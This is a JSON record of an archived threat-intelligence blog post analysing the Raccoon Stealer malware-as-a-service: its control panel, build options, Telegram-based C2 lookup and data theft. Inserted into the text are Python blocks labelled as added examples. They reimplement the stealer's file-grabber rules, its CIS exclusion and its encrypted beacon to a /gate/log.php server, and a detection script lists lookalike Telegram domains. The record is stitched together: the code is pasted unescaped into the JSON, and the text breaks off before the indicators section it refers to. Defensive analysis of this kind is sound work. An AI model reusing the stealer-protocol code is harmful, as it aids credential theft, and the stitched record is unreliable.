{
	"id": "a3cf0f59-7943-4c4b-b92d-88ab9fa3cb02",
	"created_at": "2026-04-06T00:10:59.53924Z",
	"updated_at": "2026-04-10T03:37:09.327827Z",
	"deleted_at": null,
	"sha1_hash": "c0dfd25d62f8d7bf789a3bce879ccd046bed2167",
	"title": "Raccoon Stealer Announce Return After Hiatus",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 585967,
	"plain_text": "Raccoon Stealer Announce Return After Hiatus\r\nBy Noel Anthony Llimos\r\nPublished: 2023-08-15 · Archived: 2026-04-05 18:03:19 UTC\r\nhttps://cyberint.com/blog/financial-services/raccoon-stealer/\r\nPage 1 of 18\r\nTable of contents\r\nIntroduction to Raccoon Stealer\r\nNew Features and Updates\r\nRaccoon Stealer Behavior and Capabilities\r\nRaccoon Stealer Control Panel\r\nRaccoon Stealer Payload\r\nRecommendations to Protect Against Raccoon Stealer\r\nCyberint and the Dark Web\r\nIndicators of Compromise\r\nAppendix A – Raccoon Stealer ‘User Agreement’\r\nAppendix B – Raccoon Stealer FAQ\r\nReferences\r\nThe author\r\nNoel Anthony Llimos\r\nImproving assessment policies and processes on safety and security in organizations is essential in outlining potential breaches and dangers to workers and properties. As an individual with a unique skill set, I have helped to identify security measures and appropriate solutions to mitigate various security risks.\r\nIntroduction to Raccoon Stealer\r\nFirst observed in 2019 and advertised as a ‘Malware-as-a-Service’ (MaaS) threat on various cybercriminal forums, Raccoon is an information stealer targeting victim credentials and cryptocurrency wallets.\r\nSeemingly favored by some threat actors due to its simplicity, the malware element of Raccoon omits advanced features, such as those used to evade detection, and instead focuses on the ‘stealer’ task at hand.\r\nWhilst this approach requires those deploying the threat to 
utilize third-party tools for evasion, such as cryptors or packers to thwart signature-based detection, the ongoing popularity and apparent success of Raccoon suggests that this has not been a problem for many.\r\nLacking a distribution method of its own, past Raccoon incidents appear to have begun with malicious document attachments delivered via indiscriminate unsolicited email (malspam) campaigns. Raccoon has also been reported as being dropped by third-party exploit kits and by other malware families.\r\nRaccoon samples have been seen to mimic other executables and, based on their filenames, these have likely been distributed via sites hosting copyright-infringing materials, which should in themselves be considered high-risk and avoided.\r\nFurther contributing to Raccoon’s continued prevalence and success, those behind this MaaS offering are lauded for their high levels of service, and their management dashboard, much like the malware element, is reportedly straightforward and easy to use.\r\nIn 2019 Raccoon was advertised on various cybercriminal forums with subscriptions available for $499 (US) for four months, $200 for one month and $75 for a ‘trial’ week. 
The minimal outlay combined with a positive reputation appealed to many less sophisticated threat actors, especially given the potential return on investment (ROI) following the resale or abuse of stolen credentials and cryptocurrency wallets.\r\nBut yesterday, the Raccoon Infostealer operators announced its return after a hiatus of six months.\r\nFigure 1 – Raccoon operator post in a hacking forum\r\nIn October 2022, Mark Sokolovsky, one of the main operators responsible for the infrastructure of the Raccoon Infostealer, was arrested in the Netherlands, with an extradition request from the United States, for his role in operating the Raccoon Infostealer malware-as-a-service (MaaS).\r\nFollowing his arrest, the FBI collected data stolen from many computers that cybercriminals had infected with Raccoon Infostealer. While an exact number has yet to be verified, FBI agents have identified more than 50 million unique credentials and forms of identification (email addresses, bank accounts, cryptocurrency addresses, credit card numbers, etc.) in the stolen data, from what appears to be millions of potential victims around the world. The credentials appear to include over four million email addresses.\r\nThe arrest of Mark Sokolovsky caused the Raccoon Infostealer operators to temporarily halt the operation for fear of being indicted. As mentioned above, Raccoon Infostealer was one of the most well-known and popular infostealers because of its relatively low price (a USD$75 weekly subscription and $200 per month) and its promising features. 
Also known as “Racealer,” Raccoon Infostealer is used to steal sensitive and confidential information, including login credentials, credit card information, cryptocurrency wallets, and browser information (cookies, history, autofill) from almost 60 applications.\r\nNew Features and Updates\r\n1. Quick search for cookies and passwords – The new Raccoon admin panel introduces a new way to search for URLs in the latest version. Finding specific links in large datasets is now much faster, even when dealing with millions of documents and thousands of different links. The improvement is not a minor upgrade: it changes how searches work for those who purchase Raccoon, making them much quicker even with huge amounts of data. This update aims to make it easier for threat actors to find the links they need, providing a new level of convenience.\r\nFigure 2 – Raccoon Stealer quick search module\r\n2. Automatic bot blocking and panel display – A new system has been added to detect unusual activity patterns, such as multiple accesses from the same IP address or range. If this system identifies suspicious behavior, it automatically deletes the records associated with that activity and updates the information shown in each client’s panel. The target is logs generated by sandboxes and other automated analysis systems, which makes it harder for security tools that rely on automated execution and bots to study the malware.\r\nFigure 3 – Raccoon Stealer dashboard with bot blocking and panel display\r\nLegend: Green smiley = activity of the IP is normal. Red smiley = high probability that bots or other automated systems created or actively used the log.\r\n3. 
Reporting System – This feature was added to block IP addresses used by crawlers and bots, which are often used by security practitioners to monitor Raccoon traffic.\r\nFigure 4 – Raccoon Stealer reporting system per IP address\r\n4. Log Statistics – With this, any threat actor who purchases Raccoon Infostealer can see the top countries by number of logs, as in the first versions of the stealer.\r\nFigure 5 – Raccoon Stealer log graph feature\r\nRaccoon Stealer Behavior and Capabilities\r\nRaccoon targets a wide range of applications and uses specific techniques to extract and harvest data from those applications.\r\nRaccoon follows the same procedure to extract data from each targeted application:\r\n• Extract the application file that contains the sensitive data.\r\n• Copy the file to a working folder (%Temp%).\r\n• Create and write a text file in the target application’s output folder containing the stolen information.\r\nTo obtain and decrypt credentials from applications, Raccoon acquires and downloads the DLLs associated with those applications.\r\nRaccoon Stealer Target Applications\r\nBrowsers:\r\n• Google Chrome\r\n• Comodo Dragon\r\n• Amigo\r\n• Orbitum\r\n• Bromium\r\n• Nichrome\r\n• RockMelt\r\n• 360Browser\r\n• Vivaldi\r\n• Opera\r\n• Sputnik\r\n• Kometa\r\n• Uran\r\n• QIP Surf\r\n• Epic Privacy\r\n• CocCoc\r\n• CentBrowser\r\n• 7Star\r\n• Elements\r\n• TorBro\r\n• Suhba\r\n• Safer Browser\r\n• Mustang\r\n• Superbird\r\n• Chedot\r\n• Torch\r\n• Internet Explorer\r\n• Microsoft Edge\r\n• Firefox\r\n• WaterFox\r\n• SeaMonkey\r\n• PaleMoon\r\nEmail Clients:\r\n• 
ThunderBird\r\n• Outlook\r\n• Foxmail\r\nCryptocurrency:\r\n• Electrum\r\n• Ethereum\r\n• Exodus\r\n• Jaxx\r\n• Monero\r\n• Bither\r\nAfter successfully extracting data and information, Raccoon gathers all the files into a newly created archive named “Log.zip”. The archive is then sent to its configured C\u0026C server, after which the malware removes traces of the infection.\r\nFigure 6 – Log.zip archive created by Raccoon to store stolen information\r\nThe resurgence of the well-known infostealer “Raccoon” following a hiatus has triggered alarm in the cyber security landscape, particularly within the financial sector. The return of Raccoon highlights the potential danger for industries like finance, which are prime targets for data breaches and financial fraud.\r\nRaccoon Stealer Control Panel\r\nHosted on a Tor onion service, the Raccoon control panel gives subscribers a central place from which they can generate and/or manage campaign configurations, build Raccoon malware payloads, and view data stolen from victims.\r\nDisplayed in English by default, although also available in Russian, visitors to the control panel are prompted to log in using the username and password (Figure 7) they presumably received when subscribing.\r\nFigure 7 – Dashboard login\r\nVisitors can also view the Support page, without authentication, which provides both Jabber and Telegram contact details for those behind this MaaS threat (Figure 8).\r\nFigure 8 – Support contacts\r\nGiven the inability to purchase access through this official control panel, threat actors seeking access would presumably need to initiate contact with the Raccoon team, via their forum posts or using the contact details above to 
‘subscribe’.\r\nAlthough access to this control panel requires an active Raccoon subscription and credentials, screenshots previously shared by the threat actor provide an insight into its interface and functionality based on the available menu options (Figure 9).\r\nFigure 9 – Menu options\r\nNotably, the control panel makes use of JavaScript resources (Figure 10) that can be accessed without authentication, allowing some of the current functionality to be determined, including features that would likely require administrative access.\r\nFigure 10 – Control panel HTML including the ‘revealing’ JavaScript resource\r\nIn addition, the JavaScript exposes text related to the user agreement and FAQ sections, both of which are provided within the appendices for reference.\r\nAdministrative Options\r\nBased on an analysis of the exposed JavaScript resource, the following additional menu options appear to be available to Raccoon’s administrators:\r\n• All logs\r\n• All statistics\r\n• News\r\n• Proxies\r\n• Users\r\nPotentially leaving a subscriber unaware of their malware deployment’s success, code references related to the ‘All logs’ and ‘All statistics’ options appear to provide Raccoon administrators with the ability to access and/or delete data processed by the platform.\r\nThis theoretically allows administrators to have their pick of any victim data; it would be naive to think otherwise, and it may therefore be one cost of doing business with other cybercriminals, especially given the adage that there is no honor amongst thieves.\r\nCommonly used for anonymization, even though the intent is not obvious from the JavaScript (Figure 11) and may be related to their gate infrastructure, the ‘Proxy’ option enables Raccoon 
administrators to add, remove and test proxies, including running checks against ‘VT’ (presumably VirusTotal), as well as assigning them to and from users.\r\nFigure 11 – Proxy functionality available to control panel administrators\r\nGiven that the Raccoon malware component does not appear to upload stolen data directly to this Tor onion site, it is possible that the proxy configuration is used to mask the exfiltration process to intermediate infrastructure, although, without further analysis, this is currently speculation.\r\nFinally, the remaining administrative options are likely more self-explanatory, with the ‘News’ option facilitating the creation of news articles or notifications and the ‘Users’ option providing subscriber management.\r\nStatistics/Account\r\nLikely displayed upon login and the default page for a subscriber visiting the control panel, the Statistics panel provides an at-a-glance overview of active campaigns (Figure 12).\r\nFigure 12 – Management control panel ‘Statistics’ and ‘Account’\r\nAdditionally, the Account section displays the current Main and Bonus balances, likely related to subscription funds, alongside options that allow the control panel interface to be switched between light and dark modes, the configuration of two-factor authentication, and a password reset function.\r\nNotably, the ‘Check wallets’ option visible in the screenshot does not appear to be referenced by the current JavaScript resource and may have been removed. 
Whilst vague, this option may have provided the ability to determine the value of stolen cryptocurrency wallets, such as via public blockchain services, although with an increase in targeted currencies it may no longer be relevant.\r\nLogs\r\nSeemingly enhanced since Raccoon’s initial release, victim data presented within a legacy screenshot (Figure 13) is consistent with the malware’s current capabilities but lacks additional columns identified from an analysis of the currently deployed JavaScript resource.\r\nFigure 13 – Management control panel ‘Logs’\r\nBased on the current control panel, it appears that the ‘Logs’ table now shows the following headers:\r\nGEO – Country code based on victim IP address geolocation.\r\nIP – Victim IP address.\r\nUSR – Implies ‘username’ but may be another unique victim identifier (references ‘bot_id’).\r\nUTC – Victim system time.\r\nUA – Victim browser user-agent string.\r\nPWD – Number of acquired victim passwords.\r\nCKE – Number of acquired victim cookies.\r\nCC – Number of acquired victim credit card details.\r\nWLT – Number of acquired victim cryptocurrency wallets.\r\nTAG – Likely a user-customizable tag feature.\r\nDAT – Potentially identifies the date/time the data was acquired (references ‘create_data_unix’).\r\nUSR – Seemingly duplicated header displaying the victim’s username.\r\nCOM – Customizable comment field.\r\nGET – Displays the exfiltrated file size and allows the Zip archive to be downloaded.\r\nACT – Additional ‘actions’ including the ability to delete the stolen data.\r\nA comprehensive search capability is also provided within the Logs section (Figure 14) that, given the presence of an elasticsearch_id string within the JavaScript, may indicate that the control panel is using Elasticsearch to store stolen data.\r\nFigure 14 – 
Log search capability\r\nBuilds/Config\r\nUndoubtedly used to configure and create Windows executables that contain the Raccoon stealer payload, the JavaScript resource provides an indication of the functionality present in the Builds and Configs sections of the control panel.\r\nBased on the FAQ, subscribers have the ability to generate a single build, although multiple configurations are supported as these can be updated and downloaded from the C2 infrastructure mid-campaign. In addition to preventing subscriber abuse, such as account sharing or usage after license expiration, this eliminates the need for subscribers to rebuild their payload after making subtle configuration changes.\r\nHaving assigned a name to their configuration, the following options can be set:\r\nScreenshots – Disabled by default; takes a screenshot of the victim desktop.\r\nBrowser history – Disabled by default; gathers 1,000 lines of recent web-browser history.\r\nSelf removal – Automatically removes Raccoon stealer after data exfiltration.\r\nFile loader URLs – Download and execute additional payloads on the victim host after data exfiltration.\r\nAdditionally, ‘file grabber rules’ can be configured to allow collection and exfiltration of files from victim hosts based on the following conditions:\r\nPath – Starting directory on the victim host from which to start the ‘file grabber’; for example: C:\\ .\r\nMask – Comma-delimited list of filename masks including wildcards; for example: *.doc,*.xls .\r\nSize Limit – Maximum size per file (up to 100 MB), specified in kilobytes; for example, 150 KB would be: 150 .\r\nExceptions – Directories, within the specified path, to be excluded from searches; for example: \\Windows\\ .\r\nSubfolders – Presumably enabling or disabling searches within subdirectories.\r\nShortcuts – Collect matching files referenced by shortcuts; for example, file.doc.lnk would download the corresponding file.doc 
.\r\nAfter defining and selecting a configuration, the build process allows the creation of either a dynamic link library (DLL) or executable (EXE) that would enable the threat actor to deliver and launch the payload using their preferred method.\r\nAs a somewhat professional touch, and likely contributing toward the positive opinion of Raccoon, a test feature allows this newly built payload to be tested in a virtual machine maintained by the Raccoon team. Presumably used to check that the payload successfully executes and communicates with the C2 infrastructure, the conclusion of this test reportedly results in a notification being sent to the subscriber via the control panel.\r\nConsistent with many other Russian-language cybercriminal threats, attention is drawn to the fact that Raccoon stealer will not function on victim hosts that are determined to be within the Commonwealth of Independent States (CIS) based on their system locale (language) or IP address. 
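As an added example, not code from the page or from the Raccoon panel, the following Python models how a build configuration of the kind described in the Builds/Config section above would be evaluated on a victim host: the CIS locale and geolocation gate, then a single file grabber rule (path, mask, size limit, exceptions, subfolders, shortcuts) applied to a constructed in-memory file listing. The CIS lists, the file listing, the rule values and the function names payload_would_run and select_files are assumptions; paths are written with forward slashes, which PureWindowsPath accepts in place of the backslashes the panel uses.

```python
from dataclasses import dataclass
from fnmatch import fnmatch
from pathlib import PureWindowsPath

# Hypothetical CIS language and country lists used to model the gate the text
# describes; the list actually embedded in the payload is not on the page.
CIS_LANGUAGES = {'ru', 'be', 'kk', 'ky', 'tg', 'uz', 'hy', 'az'}
CIS_COUNTRIES = {'RU', 'BY', 'KZ', 'KG', 'TJ', 'UZ', 'AM', 'AZ', 'MD'}
MAX_SIZE_KB = 100 * 1024          # the panel caps the per-file limit at 100 MB


def payload_would_run(system_locale, geo_country):
    '''Refuse to run when either the system locale language (e.g. ru-RU)
    or the IP geolocation country code points at the CIS.'''
    language = system_locale.split('-')[0].lower()
    return language not in CIS_LANGUAGES and geo_country.upper() not in CIS_COUNTRIES


@dataclass
class GrabberRule:
    path: str                  # starting directory, e.g. C:/ (the panel writes C: followed by a backslash)
    masks: str                 # comma-delimited filename masks, e.g. *.doc,*.xls
    size_limit_kb: int         # per-file cap in kilobytes
    exceptions: tuple = ()     # directory names below path to skip, e.g. ('Windows',)
    subfolders: bool = True    # descend into subdirectories
    shortcuts: bool = False    # also collect the target of a matching .lnk file


@dataclass
class VictimFile:
    '''Constructed stand-in for a file on the victim host (no real disk access).'''
    path: str
    size: int                  # bytes
    lnk_target: str = ''       # for .lnk files: the path the shortcut points to


def select_files(rule, files):
    '''Return the paths one grabber rule would collect from a victim file list.'''
    root = PureWindowsPath(rule.path)
    masks = [m.strip().lower() for m in rule.masks.split(',') if m.strip()]
    limit = min(rule.size_limit_kb, MAX_SIZE_KB) * 1024
    skip = {e.lower() for e in rule.exceptions}
    by_path = {PureWindowsPath(f.path): f for f in files}
    taken = []
    for f in files:
        p = PureWindowsPath(f.path)
        try:
            rel_dirs = p.relative_to(root).parts[:-1]   # directories below root
        except ValueError:
            continue                                    # not under the rule's path
        if rel_dirs and not rule.subfolders:
            continue
        if any(d.lower() in skip for d in rel_dirs):
            continue
        target = f
        if p.suffix.lower() == '.lnk':
            # A shortcut only counts when the rule allows following it and the
            # target is known; the target file is what gets exfiltrated.
            if not rule.shortcuts or not f.lnk_target:
                continue
            target = by_path.get(PureWindowsPath(f.lnk_target))
            if target is None:
                continue
        name = PureWindowsPath(target.path).name.lower()
        if not any(fnmatch(name, m) for m in masks):
            continue
        if target.size > limit:
            continue
        if target.path not in taken:
            taken.append(target.path)
    return taken


# Constructed victim file listing (not from the page).
SAMPLE_FILES = [
    VictimFile('C:/Users/victim/Documents/budget.xls', 40_000),
    VictimFile('C:/Users/victim/Documents/notes.txt', 1_000),
    VictimFile('C:/Users/victim/Documents/archive/plan.doc', 2_000_000),   # over the 150 KB cap
    VictimFile('C:/Users/victim/Desktop/report.doc', 90_000),
    VictimFile('C:/Users/victim/Desktop/secret.doc.lnk', 1_500, lnk_target='E:/usb/secret.doc'),
    VictimFile('E:/usb/secret.doc', 3_000),                               # only reachable via the shortcut
    VictimFile('C:/Windows/System32/setup.doc', 5_000),                    # under an excepted directory
]
RULE = GrabberRule(path='C:/', masks='*.doc,*.xls', size_limit_kb=150, exceptions=('Windows',))

if __name__ == '__main__':
    print(payload_would_run('en-US', 'US'), payload_would_run('ru-RU', 'DE'))
    print(select_files(RULE, SAMPLE_FILES))
    print(select_files(GrabberRule('C:/', '*.doc,*.xls', 150, ('Windows',), True, True), SAMPLE_FILES))
```

With the rule as written, only budget.xls and report.doc are collected: plan.doc exceeds the 150 KB cap, setup.doc sits under the excepted Windows directory, and the shortcut is ignored until the rule enables shortcuts, at which point the E: drive file it points to is collected even though it lies outside the rule's path.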
Subscribers are also reminded to ‘crypt’ their builds to evade detection and to ‘keep in mind’ that long-term use could increase the chances of detection (Figure 15).\r\nFigure 15 – Build/Config warnings\r\nRaccoon Stealer Payload\r\nHaving tested and secured their payload, the threat actor will need to deliver Raccoon to would-be victims.\r\nBased on observations of recent activity, many appear to favor using malicious document attachments sent via unsolicited email (malspam) campaigns, potentially linked to the use of third-party exploit kits or other malware families, as well as Raccoon payloads being uploaded to file-sharing sites, such as those hosting copyright-infringing materials, and/or mimicking other executables.\r\nCommand \u0026 Control\r\nBased on the intelligence gathered from the Raccoon Stealer control panel, each payload will attempt to communicate with some seemingly benign or legitimate URL from which an encrypted string is gathered and processed to obtain the true command and control (C2) URL, typically comprised of an IP address and potentially a /gate/log.php resource.\r\nAs detailed in a February 2020 analysis, Raccoon previously hid this C2 server address in an encrypted string that posed as a filename hosted on Google Drive, although this is seemingly no longer the case.\r\nBased on analysis of recent payloads, Raccoon currently communicates with websites offering Telegram URL shortening services. 
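The call-home sequence this section describes in the following paragraphs (Telegram profile lookup, XOR-decoded gate URL, RC4-and-base64 beacon carrying b=, c= and f=, and a JSON configuration in reply) is shown end to end in the added Python example below. It is illustrative code written for this page, not Raccoon's own. The XOR key, the RC4 passphrase, the 203.0.113.10 gate address, the profile HTML fragment and the configuration values are constructed assumptions; only the element marker, the parameter names and the configuration field names come from the analysis.

```python
import base64
import json
from urllib.parse import parse_qsl

Q = chr(34)  # a literal double-quote character, used to build the HTML marker
# Hypothetical values for the walk-through: the real XOR key, RC4 passphrase
# and gate address are not on the page (203.0.113.10 is a TEST-NET address).
XOR_KEY = b'example-xor-key'
PASSPHRASE = 'example-rc4-passphrase'
C2_URL = 'http://203.0.113.10/gate/log.php'
# The preceding string Raccoon searches for in the Telegram profile page.
MARKER = 'description' + Q + ' dir=' + Q + 'auto' + Q + '>'


def xor_bytes(data, key):
    '''Repeating-key XOR; the page only says Raccoon uses its own XOR routine.'''
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def rc4(key, data):
    '''Textbook RC4 (KSA then PRGA); encryption and decryption are the same call.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def extract_c2_blob(html):
    '''Step 1: take the text that follows the marker, up to the next tag.'''
    start = html.index(MARKER) + len(MARKER)
    return html[start:html.index('<', start)].strip()


def decode_c2_url(blob, key=XOR_KEY):
    '''Step 2: base64-decode and XOR to recover the gate URL (layout assumed).'''
    return xor_bytes(base64.b64decode(blob), key).decode()


def build_beacon(machine_guid, username, config_id, passphrase=PASSPHRASE):
    '''Step 3: the b=, c= and f= parameters, RC4-encrypted then base64-encoded.'''
    params = 'b=' + machine_guid + '_' + username + '&c=' + config_id + '&f=json'
    return base64.b64encode(rc4(passphrase.encode(), params.encode())).decode()


def decode_beacon(body, passphrase=PASSPHRASE):
    '''Gate side: reverse build_beacon and split the parameters.'''
    return dict(parse_qsl(rc4(passphrase.encode(), base64.b64decode(body)).decode()))


def encode_config(config, passphrase=PASSPHRASE):
    '''Gate side: JSON configuration, RC4 with the same passphrase, then base64.'''
    return base64.b64encode(rc4(passphrase.encode(), json.dumps(config).encode())).decode()


def parse_config(body, passphrase=PASSPHRASE):
    '''Step 4: the bot reverses encode_config to obtain its JSON configuration.'''
    return json.loads(rc4(passphrase.encode(), base64.b64decode(body)))


def call_home(html, machine_guid, username, config_id):
    '''Client side end to end: profile page -> gate URL -> body for the HTTP POST.'''
    url = decode_c2_url(extract_c2_blob(html))
    return url, build_beacon(machine_guid, username, config_id)


# Constructed Telegram profile fragment and configuration (not from the page);
# the field names follow the analysis, the values are made up.
C2_BLOB = base64.b64encode(xor_bytes(C2_URL.encode(), XOR_KEY)).decode()
SAMPLE_HTML = ('<div class=' + Q + 'tgme_page_description' + Q + ' dir=' + Q
               + 'auto' + Q + '>' + C2_BLOB + '</div>')
SAMPLE_CONFIG = {
    '_id': 'cfg-0001',
    'au': 'http://203.0.113.10/files/',          # path holding e.g. sqlite3.dll
    'ls': ['sqlite3.dll'],
    'ip': '198.51.100.7',
    'location': {'country': 'Example', 'country_code': 'EX', 'city': 'Nowhere'},
    'c': {'m': '*.doc,*.xls', 'lu': [], 'rm': 1,
          'is_screen_enabled': 0, 'is_history_enabled': 1, 'depth': 2},
}

if __name__ == '__main__':
    url, body = call_home(SAMPLE_HTML, '8f3c0b6a-1c2d-4e5f-9a8b-7c6d5e4f3a2b', 'victim', 'a1b2c3d4')
    print(url, decode_beacon(body))
    print(parse_config(encode_config(SAMPLE_CONFIG))['c'])
```

Because both directions use the same RC4 passphrase and the gate URL is recoverable from a public profile page, a defender who pulls the passphrase and XOR key from one sample can decode every beacon and configuration for that build; the only element that changes per victim is the b= value, which is why the machine GUID and username make a useful pivot in captured traffic.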
Upon access, the profile overview of a threat actor-controlled Telegram user is displayed (Figure 16) with the ‘description’ field containing an encrypted C2 string.\r\nFigure 16 – Example Telegram user details\r\nParsing this HTML response, Raccoon locates the encrypted C2 URL by searching for the preceding string description\" dir=\"auto\"\u003e (Figure 17).\r\nFigure 17 – Telegram user details HTML (Yellow: element search; Red: encoded string)\r\nWhile this approach allows the C2 servers to be easily updated, the use of third-party Telegram URL shortening services rather than the legitimate service ( https://t[.]me/\u003cGROUP|USER\u003e ) allows defenders to detect and block anomalous behavior, especially given the low-reputation domains on which these are hosted.\r\nHaving decoded and decrypted the C2 URL using its own XOR cipher routines, Raccoon calls home via an HTTP POST containing three parameters hidden in a base64-encoded and RC4-encrypted string (Figure 18):\r\nb= – Bot identifier, comprised of the victim ‘machine GUID’ (the MachineGuid value found in the Windows registry under HKLM\\SOFTWARE\\Microsoft\\Cryptography), an underscore and the victim username.\r\nc= – Configuration identifier, a hexadecimal string or hash that refers to a specific threat actor’s configuration.\r\nf= – Configuration file format, only observed as being set to ‘JSON’.\r\nFigure 18 – Example C2 HTTP POST\r\nIn response, the C2 server sends a JSON configuration, also base64-encoded and RC4-encrypted with the same passphrase, containing the following values (Figure 19):\r\n_id – Identifier, potentially related to the threat actor or some combination of victim and/or configuration.\r\nau – Previously known as attachment_url, specifies the C2 path containing supporting 
files used by the Raccoon payload, such as sqlite3.dll.\r\nls – Previously known as libraries, supporting files for the Raccoon payload.\r\nip – Victim IP address.\r\nlocation – Victim IP geolocation; contains country, country_code, state, state_code, city, zip, latitude and longitude.\r\nc – Previously known as the config section; contains:\r\nm – Previously known as masks, specifies any file search masks used for data theft.\r\nlu – Previously known as loader_urls, specifies any additional payloads to be downloaded and executed after the conclusion of Raccoon’s data exfiltration.\r\nlu – Seemingly a second loader_urls value.\r\nrm – Disables (0) or enables (1) the self-removal feature.\r\nis_screen_enabled – Disables (0) or enables (1) the screenshot feature.\r\nis_history_enabled – Disables (0) or enables (1) the browser history acquisition feature.\r\ndepth – Undetermined, potentially a path depth used to limit the file search mask feature.\r\nFigure 19 – Example C2 response\r\nData Theft\r\nRaccoon stealer can extract credentials, cookies and payment card data from a number of applications, including the following as identified from recently analyzed samples:\r\nBrowsers: Google Chrome, Mozilla Firefox, Opera and those that are Chromium-based, including Microsoft Edge.\r\nCryptocurrency Wallets: Electron Cash, Electrum-LTC, Ethereum, Exodus, Guarda, Jaxx Liberty, MetaMask and MyMonero.\r\nNotably, to gather other cryptocurrency wallets, Raccoon also searches for the commonly used filename wallet.dat.\r\nUtilizing dynamic link libraries (DLL) downloaded from C2 paths specified in the JSON configuration and saved to %USERPROFILE%\\AppData\\LocalLow\\, supporting files allow access to data stored by the targeted applications. For example, recent campaigns have been observed as deploying the legitimate 
SQLite file sqlite3.dll, allowing access to browser data stored within SQLite databases.\r\nIn addition to data theft, Raccoon gathers system information that is saved in a file named machineinfo.txt and includes details of the build version, operating system, hardware and installed applications (Figure 20).\r\nFigure 20 – Example machineinfo.txt file\r\nHaving completed both the data theft and information gathering stages, Raccoon generates an exfiltration Zip archive in %USERPROFILE%\\AppData\\LocalLow\\ using the configuration _id value followed by .zip as the filename, rather than Log.zip as previously.\r\nOnce prepared, this archive is uploaded to a C2 gate server, notably without encryption, via an HTTP POST. Presumably confirming the upload, the server responds with a forty-character hexadecimal string, potentially a SHA1 hash or checksum, before Raccoon acts on any final configuration such as self-removal or the download and execution of additional payloads.\r\nAdditional Payloads\r\nGiven the file loader capability provided by Raccoon, it is possible for a threat actor to initiate the download and execution of additional payloads once the stealer has completed its data exfiltration.\r\nWhile these payloads will undoubtedly change depending on each threat actor’s requirements, recent observations include the deployment of additional malware, such as tools used to gain and maintain remote access, as well as crypto-jacking payloads that abuse a compromised host’s computational power to mine cryptocurrencies including ‘Ether’.\r\nIn the latter case, crypto-jacking payloads typically join a shared mining pool and will likely generate significant cryptocurrency income for the threat actor given enough victims.\r\nFurthermore, those behind Raccoon announced the beta release of a module on April 23, 2021 
(Figure 21) named Raccoon Clipper that currently targets Bitcoin (BTC), Dogecoin (DOGE), Ethereum (ETH), Litecoin (LTC) and Monero (XMR) cryptocurrency wallets.\r\nFigure 21 – ‘Raccoon Clipper’ forum announcement\r\nBased on a promotional video released alongside this announcement (Figure 22), this module surreptitiously replaces legitimate payment addresses within cryptocurrency applications, resulting in victims inadvertently making payments to a cryptocurrency address belonging to the threat actor.\r\nFigure 22 – Promotional video (Left: legitimate address removed; Right: threat actor address inserted)\r\nInformation stealer malware constitutes a persistent and adaptive threat that demands a layered response from defenders. Several key strategies emerge as these malicious tools continuously refine their techniques to target sensitive data across individuals, businesses, and industries. Organizations must adopt an agile defense approach that combines advanced endpoint security, robust network monitoring, and proactive threat intelligence sharing to counter information stealer malware effectively.\r\nAdditionally, user awareness and adherence to data protection regulations are crucial. By prioritizing comprehensive training, strengthening security measures, and practicing collaboration among security professionals, organizations can establish a more resilient defense against the evolving tactics of information stealer malware. 
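As an added example, not from the original post, the following Python applies the two network observables this analysis gives defenders, the lookalike Telegram domains listed in the Indicators of Compromise section below and HTTP POSTs to a /gate/log.php path on a bare-IP host, to a handful of constructed proxy log lines. The log format, the client addresses, the 100 KB threshold separating a configuration beacon from a Log.zip upload, and the telegram-label heuristic are assumptions made for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Lookalike Telegram domains from the Indicators of Compromise section, with
# the de-fanging brackets removed so they match real log entries.
TELEGRAM_LOOKALIKES = {
    'telete.in', 'telecut.in', 'tgraph.io', 'tttttt.me', 'telegram.cat',
    'telegram.services', 'tlgr.org', 'xn--r1a.click', 'xn--r1a.link',
    'xn--r1a.live', 'xn--r1a.site', 'xn--r1a.website',
}
# Legitimate Telegram hosts that must never trigger the heuristic rule.
TELEGRAM_LEGIT = {'t.me', 'telegram.org', 'telegram.me', 'web.telegram.org'}
EXFIL_BYTES = 100_000   # assumed: a config beacon is tiny, a Log.zip upload is not


def host_is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(method, url, req_bytes):
    '''Return the rule a single request trips, or None.'''
    parts = urlsplit(url)
    host = (parts.hostname or '').lower()
    if host in TELEGRAM_LOOKALIKES:
        return 'telegram-lookalike'
    # Heuristic (assumption): a telegram label on a host that is not the real service.
    if 'telegram' in host.split('.') and host not in TELEGRAM_LEGIT:
        return 'telegram-lookalike'
    if method == 'POST' and host_is_ip(host) and parts.path.endswith('/gate/log.php'):
        return 'gate-exfil' if req_bytes >= EXFIL_BYTES else 'gate-beacon'
    return None


def detect(lines):
    '''Parse constructed proxy lines: time client method url status request_bytes.'''
    alerts = []
    for line in lines:
        ts, client, method, url, status, req_bytes = line.split()
        rule = classify(method, url, int(req_bytes))
        if rule:
            alerts.append({'time': ts, 'client': client, 'rule': rule, 'url': url})
    return alerts


def hosts_with_chain(alerts):
    '''Clients that show both the Telegram lookup and a gate POST: the full call-home chain.'''
    seen = {}
    for a in alerts:
        seen.setdefault(a['client'], set()).add(a['rule'])
    return {c for c, rules in seen.items()
            if 'telegram-lookalike' in rules and rules & {'gate-beacon', 'gate-exfil'}}


# Constructed proxy log lines (not from the page); the telete.in URL is the
# first entry in the IOC list, the 10.0.0.0/8 clients and 203.0.113.10 are made up.
SAMPLE_LOGS = [
    '2023-08-14T10:00:01Z 10.0.0.5 GET https://t.me/somechannel 200 0',
    '2023-08-14T10:00:02Z 10.0.0.7 GET https://telete.in/jiocacossa 200 0',
    '2023-08-14T10:00:03Z 10.0.0.7 POST http://203.0.113.10/gate/log.php 200 212',
    '2023-08-14T10:00:09Z 10.0.0.7 POST http://203.0.113.10/gate/log.php 200 1843200',
    '2023-08-14T10:01:00Z 10.0.0.9 GET https://www.example.com/ 200 0',
    '2023-08-14T10:02:00Z 10.0.0.9 POST https://api.example.com/gate/log.php 200 300',
    '2023-08-14T10:03:00Z 10.0.0.11 GET https://telegram.services/abc 200 0',
]

if __name__ == '__main__':
    found = detect(SAMPLE_LOGS)
    for a in found:
        print(a['client'], a['rule'], a['url'])
    print('full chain:', hosts_with_chain(found))
```

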